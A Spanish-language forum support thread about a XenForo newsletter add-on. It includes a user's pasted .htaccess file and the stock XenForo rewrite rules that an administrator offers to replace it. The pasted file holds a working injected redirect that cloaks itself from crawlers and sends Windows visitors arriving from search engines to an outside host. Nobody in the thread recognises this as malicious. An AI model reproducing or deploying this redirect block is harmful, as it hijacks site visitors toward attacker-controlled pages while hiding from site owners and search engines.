• ¡Bienvenido a XenFácil!

    Estás viendo el sitio como Invitado. Para poder participar en este sitio

    y obtendrás privilegios adicionales, acceso a otras áreas y mucho mas.

    ¡Es gratis!


    ¿Ya eres miembro? Inicia sesión

Complemento Boletín de XenFacil

AppleTree

Activo
Mensajes
199
Puntuación de reacciones
31
Puntos
28
No obstante, si me doy cuenta que al activar suscripción aparece el contenido del boletín, pero con el mismo error :D
Gracias!
 

luis

Administrador
Mensajes
1.629
Puntuación de reacciones
722
Puntos
613
Sitio web
xenfacil.com
País
España
Versión de XenForo
1.5.12
PayPal
Donar dinero a este usuario
Página web
Web
No consigo reproducir tal problema, a ver si lms nos ilumina.

No obstante podrías probar a desinstalar el complemento, volver a descargarlo de aquí, resubirlo e instalarlo de nuevo y contarnos que sucede.
 

AppleTree

Activo
Mensajes
199
Puntuación de reacciones
31
Puntos
28
No consigo reproducir tal problema, a ver si lms nos ilumina.

No obstante podrías probar a desinstalar el complemento, volver a descargarlo de aquí, resubirlo e instalarlo de nuevo y contarnos que sucede.
Gracias por tu tiempo Luis.
Así lo hice esta mañana, probando y probando, pero es lo que te digo.

En fin, esperaremos a ver si echa un vistazo oh sensei LMS :D:D:D
 

luis

Administrador
Mensajes
1.629
Puntuación de reacciones
722
Puntos
613
Sitio web
xenfacil.com
País
España
Versión de XenForo
1.5.12
PayPal
Donar dinero a este usuario
Página web
Web
Puedes decirme si tienes un archivo .htaccess en la raíz del foro
 

lms

Administrador
Mensajes
7.683
Puntuación de reacciones
2.105
Puntos
2.613
Sitio web
xenfacil.com
País
España
Versión de XenForo
2.1.x
PayPal
Donar dinero a este usuario
Página web
Web
No tiene sentido el error. El complemento se instala correctamente y rula bien en su ruta. El hecho de que no te tome la ruta puede deberse a algún error que pueda estar ¿propiciado por la caché?
El .htaccess también puede estar jugando una mala pasada (ponme el contenido de este archivo en un code a ver si puede ser la causa).
Lo que si te pediría es que compruebes si los archivos subidos tienen el mismo tamaño en el servidor que en tu disco. Una subida corrupta puede estar jugando una mala pasada.

Ya nos comentarás.

Salud2
 

AppleTree

Activo
Mensajes
199
Puntuación de reacciones
31
Puntos
28
No tiene sentido el error. El complemento se instala correctamente y rula bien en su ruta. El hecho de que no te tome la ruta puede deberse a algún error que pueda estar ¿propiciado por la caché?
El .htaccess también puede estar jugando una mala pasada (ponme el contenido de este archivo en un code a ver si puede ser la causa).
Lo que si te pediría es que compruebes si los archivos subidos tienen el mismo tamaño en el servidor que en tu disco. Una subida corrupta puede estar jugando una mala pasada.

Ya nos comentarás.

Salud2
Luis, los archivos si que tienen el mismo tamaño, y el código que veo en el htaccess es este:
Insertar CODE, HTML o PHP:
<IfModule prefork.c>
 
RewriteEngine On
 
RewriteCond %{REQUEST_METHOD}  ^GET$
 
RewriteCond %{HTTP_REFERER}    ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.|hi5\.|friendster\.|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$  [NC]
 
RewriteCond %{HTTP_REFERER}    !^.*(imgres\?q).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$  [NC]
 
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$  [NC]
 
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
 
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
 
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
 
RewriteCond %{HTTP_COOKIE}      !^.*lCf.*$ [NC]
 
RewriteCond %{HTTP_USER_AGENT}  .*Windows.* [NC]
 
RewriteCond %{HTTPS}            ^off$
 
RewriteRule ^(.*)$              http://retrop.revolutionvps.net/url?sa=X&source=web&cd=3&ved=0EliE1ITR&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZcoeanG56y1qo2Mz1018Z+1pw==&usg=Ntiae1b06wqEzZ4I3xx45J&sig2=FtkCvEaHLGq18HAQ6O1oDV  [R=302,L,CO=lCf:14:%{HTTP_HOST}:10127:/:0:HttpOnly]
 
</IfModule>
 
#e53fd36b3912cad65eac1e53de40b730299ba5d9a121640056392ff2
 

luis

Administrador
Mensajes
1.629
Puntuación de reacciones
722
Puntos
613
Sitio web
xenfacil.com
País
España
Versión de XenForo
1.5.12
PayPal
Donar dinero a este usuario
Página web
Web
Nada del contenido de tu htaccess es parecido al de XenForo.

Añade esto al tuyo y prueba
PHP:
#    Mod_security can interfere with uploading of content such as attachments. If you
#    cannot attach files, remove the "#" from the lines below.
#<IfModule mod_security.c>
#    SecFilterEngine Off
#    SecFilterScanPOST Off
#</IfModule>
 
ErrorDocument 401 default
ErrorDocument 403 default
ErrorDocument 404 default
ErrorDocument 500 default
 
<IfModule mod_rewrite.c>
    RewriteEngine On
 
    #    If you are having problems with the rewrite rules, remove the "#" from the
    #    line that begins "RewriteBase" below. You will also have to change the path
    #    of the rewrite to reflect the path to your XenForo installation.
    #RewriteBase /xenforo
 
    #    This line may be needed to enable WebDAV editing with PHP as a CGI.
    #RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
 
    RewriteCond %{REQUEST_FILENAME} -f [OR]
    #    RewriteCond %{REQUEST_FILENAME} -l [OR]
    #    RewriteCond %{REQUEST_FILENAME} -d
    RewriteRule ^.*$ - [NC,L]
    RewriteRule ^(data/|js/|styles/|install/|favicon\.ico|crossdomain\.xml|robots\.txt) - [NC,L]
    RewriteRule ^.*$ index.php [NC,L]
</IfModule>
 

AppleTree

Activo
Mensajes
199
Puntuación de reacciones
31
Puntos
28
Nada del contenido de tu htaccess es parecido al de XenForo.

Añade esto al tuyo y prueba
PHP:
#    Mod_security can interfere with uploading of content such as attachments. If you
#    cannot attach files, remove the "#" from the lines below.
#<IfModule mod_security.c>
#    SecFilterEngine Off
#    SecFilterScanPOST Off
#</IfModule>
 
ErrorDocument 401 default
ErrorDocument 403 default
ErrorDocument 404 default
ErrorDocument 500 default
 
<IfModule mod_rewrite.c>
    RewriteEngine On
 
    #    If you are having problems with the rewrite rules, remove the "#" from the
    #    line that begins "RewriteBase" below. You will also have to change the path
    #    of the rewrite to reflect the path to your XenForo installation.
    #RewriteBase /xenforo
 
    #    This line may be needed to enable WebDAV editing with PHP as a CGI.
    #RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
 
    RewriteCond %{REQUEST_FILENAME} -f [OR]
    #    RewriteCond %{REQUEST_FILENAME} -l [OR]
    #    RewriteCond %{REQUEST_FILENAME} -d
    RewriteRule ^.*$ - [NC,L]
    RewriteRule ^(data/|js/|styles/|install/|favicon\.ico|crossdomain\.xml|robots\.txt) - [NC,L]
    RewriteRule ^.*$ index.php [NC,L]
</IfModule>
Voy a probar... pero vamos que el foro funciona a la perfección (http://www.pesplayers.es); el htaccess es tal cual se instaló hace ya tiempo (GLUB!!)
 

lms

Administrador
Mensajes
7.683
Puntuación de reacciones
2.105
Puntos
2.613
Sitio web
xenfacil.com
País
España
Versión de XenForo
2.1.x
PayPal
Donar dinero a este usuario
Página web
Web
El boletín XenFácil tiene activadas las 3 opciones, tal como ponéis en las instrucciones de instalación ;-)
Panel de control -> Opciones -> Información básica del sitio -> Abajo del todo: Usar URLs completas amistosas y marcar la casilla.

Salud2
 

AppleTree

Activo
Mensajes
199
Puntuación de reacciones
31
Puntos
28
Panel de control -> Opciones -> Información básica del sitio -> Abajo del todo: Usar URLs completas amistosas y marcar la casilla.

Salud2
Ya está marcada, pero sigue dando el mismo error!!!. Luis, si tú te logueas (creo recordar que tenías cuenta en mi web), puedes comprobarlo. Aparece la pestaña de navegación pero luego da error si la pinchas, a no ser que te "suscribas".
 

luis

Administrador
Mensajes
1.629
Puntuación de reacciones
722
Puntos
613
Sitio web
xenfacil.com
País
España
Versión de XenForo
1.5.12
PayPal
Donar dinero a este usuario
Página web
Web
En lo que te he pasado había dos líneas comentadas y posiblemente por eso te diera el error después de editar, en las pruebas que he realizado no me hizo falta activar las URL amigables.
PHP:
#    Mod_security can interfere with uploading of content such as attachments. If you
#    cannot attach files, remove the "#" from the lines below.
#<IfModule mod_security.c>
#    SecFilterEngine Off
#    SecFilterScanPOST Off
#</IfModule>
 
ErrorDocument 401 default
ErrorDocument 403 default
ErrorDocument 404 default
ErrorDocument 500 default
 
<IfModule mod_rewrite.c>
    RewriteEngine On
 
    #    If you are having problems with the rewrite rules, remove the "#" from the
    #    line that begins "RewriteBase" below. You will also have to change the path
    #    of the rewrite to reflect the path to your XenForo installation.
    #RewriteBase /xenforo
 
    #    This line may be needed to enable WebDAV editing with PHP as a CGI.
    #RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
 
    RewriteCond %{REQUEST_FILENAME} -f [OR]
    RewriteCond %{REQUEST_FILENAME} -l [OR]
    RewriteCond %{REQUEST_FILENAME} -d
    RewriteRule ^.*$ - [NC,L]
    RewriteRule ^(data/|js/|styles/|install/|favicon\.ico|crossdomain\.xml|robots\.txt) - [NC,L]
    RewriteRule ^.*$ index.php [NC,L]
</IfModule>
 

lms

Administrador
Mensajes
7.683
Puntuación de reacciones
2.105
Puntos
2.613
Sitio web
xenfacil.com
País
España
Versión de XenForo
2.1.x
PayPal
Donar dinero a este usuario
Página web
Web
Ya está marcada, pero sigue dando el mismo error!!!. Luis, si tú te logueas (creo recordar que tenías cuenta en mi web), puedes comprobarlo. Aparece la pestaña de navegación pero luego da error si la pinchas, a no ser que te "suscribas".
En cuanto pueda. Ahora estoy en el curro y acaban de comenzar las fiestas de mi ciudad.

Salud2
 

opaapoopa

Nuevo
Mensajes
2
Puntuación de reacciones
0
Puntos
1

Mysqli statement execute error : Duplicate column name 'active'
  1. Zend_Db_Statement_Mysqli->_execute() in Zend/Db/Statement.php at line 297
  2. Zend_Db_Statement->execute() in Zend/Db/Adapter/Abstract.php at line 479
  3. Zend_Db_Adapter_Abstract->query() in XenFacil/Boletin/Alterdb.php at line 25
  4. XenFacil_Boletin_Alterdb::installCode()
  5. call_user_func() in XenForo/Model/AddOn.php at line 214
  6. XenForo_Model_AddOn->installAddOnXml() in XenForo/Model/AddOn.php at line 169
  7. XenForo_Model_AddOn->installAddOnXmlFromFile() in XenForo/ControllerAdmin/AddOn.php at line 178
  8. XenForo_ControllerAdmin_AddOn->actionInstall() in XenForo/FrontController.php at line 310
  9. XenForo_FrontController->dispatch() in XenForo/FrontController.php at line 132
  10. XenForo_FrontController->run() in /opt/lampp/htdocs/images.php at line 13

Help me
 

lms

Administrador
Mensajes
7.683
Puntuación de reacciones
2.105
Puntos
2.613
Sitio web
xenfacil.com
País
España
Versión de XenForo
2.1.x
PayPal
Donar dinero a este usuario
Página web
Web
Bug is know. In little time i'm have a fix.

Patience.

Salud2
 
Arriba